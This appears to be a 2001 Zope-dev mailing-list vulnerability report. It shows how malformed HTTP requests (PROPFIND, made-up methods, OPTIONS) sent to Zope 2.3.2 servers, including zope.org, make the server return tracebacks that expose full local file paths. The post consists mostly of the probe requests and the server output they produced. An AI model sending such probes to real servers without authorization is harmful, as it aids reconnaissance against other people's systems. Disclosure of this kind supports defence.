[Zope-dev] Vulnerability in Zope
ALife
ALife" <buginfo@inbox.ru
Sun, 23 Sep 2001 14:19:35 +0000 (GMT)
Found vulnerability: retrieve a full path to local files in Zope.
---[ Example 1 (Linux):
telnet www.zope.org 80
PROPFIND / HTTP/1.0
F
G
H
J
K
L
HTTP/1.0 500 Internal Server Error
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:38:59 GMT
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property
Sheets.py
Bobo-Exception-Type: TypeError
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property
Sheets.py
Bobo-Exception-Type: TypeError
Content-Type: text/html
Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//
EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>Welcome
to Zope.org</TITLE> <link rel="stylesheet" href="http://www.zope.org/zope_css"
type="text/css"> </HEAD> <BODY B
Bobo-Exception-Line: 369
...
<!--
Traceback (innermost last):
File /usr/local/base/Zope-2.3.2-modified/l
ib/python/ZPublisher/Publish.py, line 223, in publish_module
File /usr/local/ba
se/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
F
ile /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, i
n zpublisher_exception_hook
(Object: ApplicationDefaultPermissions)
File /us
r/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in
publish
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.p
y, line 160, in mapply
(Object: PROPFIND)
File /usr/local/base/Zope-2.3.2-mo
dified/lib/python/ZPublisher/Publish.py, line 112, in call_object
(Object: PR
OPFIND)
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py,
line 222, in PROPFIND
(Object: ApplicationDefaultPermissions)
File /usr/loc
al/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
Fi
le /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, i
n apply
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py,
line 219, in apply
File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/d
avcmds.py, line 219, in apply
File /usr/local/base/Zope-2.3.2-modified/lib/pyth
on/webdav/davcmds.py, line 175, in apply
File /usr/local/base/Zope-2.3.2-modifi
ed/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
(Object: Virtu
al)
TypeError: (see above)
-->
Host has closed connection.
---[ Example 2 (Linux):
telnet www.zope.com 80
GGGG / HTTP/1.0
or NOTREALCOMMAND / HTTP/1.0
HTTP/1.0 404 Not Found
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Fri, 21 Sep 2001 12:51:48 GMT
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/H
TTPResponse.py
Content-Type: text/html
Bobo-Exception-Type: NotFound
Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//
EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>Welcome
to Zope.org</TITLE> <link rel="stylesheet" href="http://www.zope.org/zope_css"
type="text/css"> </HEAD> <BODY B
Content-Length: 5845
Bobo-Exception-Line: 547
< ... >
<!--
Traceback (innermost last):
File /
usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, i
n publish_module
File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher
/Publish.py, line 187, in publish
File /usr/local/base/Zope-2.3.2-modified/lib/
python/Zope/__init__.py, line 221, in zpublisher_exception_hook
(Object: Appl
icationDefaultPermissions)
File /usr/local/base/Zope-2.3.2-modified/lib/python/
ZPublisher/Publish.py, line 173, in publish
File /usr/local/base/Zope-2.3.2-mod
ified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody
File /usr/loc
al/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py, line 547, in
notFoundError
NotFound: (see above)
-->
Host has closed connection.
---[ Example 3 (Win32):
OPTIONS / HTTP/1.0
or NOTREALCOMMAND / HTTP/1.0
HTTP/1.0 404 Not Found
Server: Zope/Zope 2.3.2 (binary release, python 1.5.2, win32-x86) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:06:43 GMT
Bobo-Exception-File: D:\INSTOC~1\lib\python\webdav\NullResource.py
Bobo-Exception-Type: Not Found
Content-Type: text/html
Location: http://SERVERNAME
Bobo-Exception-Value: bobo exception
Content-Length: 756
Bobo-Exception-Line: 122
<html><head><title>::</title></head><body bgcolor="#FFFFFF">
<h2>Ошибка!</h2>
<p>О
шибка при попытке опубликовать ресурс.</p>
<hr noshade>
</body></html>
<!--
Tracebac
k (innermost last):
File D:\INSTOC~1\lib\python\ZPublisher\Publish.py, line 223
, in publish_module
File D:\INSTOC~1\lib\python\ZPublisher\Publish.py, line 187
, in publish
File D:\INSTOC~1\lib\python\Zope\__init__.py, line 221, in zpublis
her_exception_hook
(Object: iVirtualHostBase)
File D:\INSTOC~1\lib\python\ZP
ublisher\Publish.py, line 162, in publish
File D:\INSTOC~1\lib\python\ZPublishe
r\BaseRequest.py, line 340, in traverse
File D:\INSTOC~1\lib\python\webdav\Null
Resource.py, line 122, in __bobo_traverse__
(Object: iVirtualHostBase)
Not Fou
nd: (see above)
-->
Host has closed connection.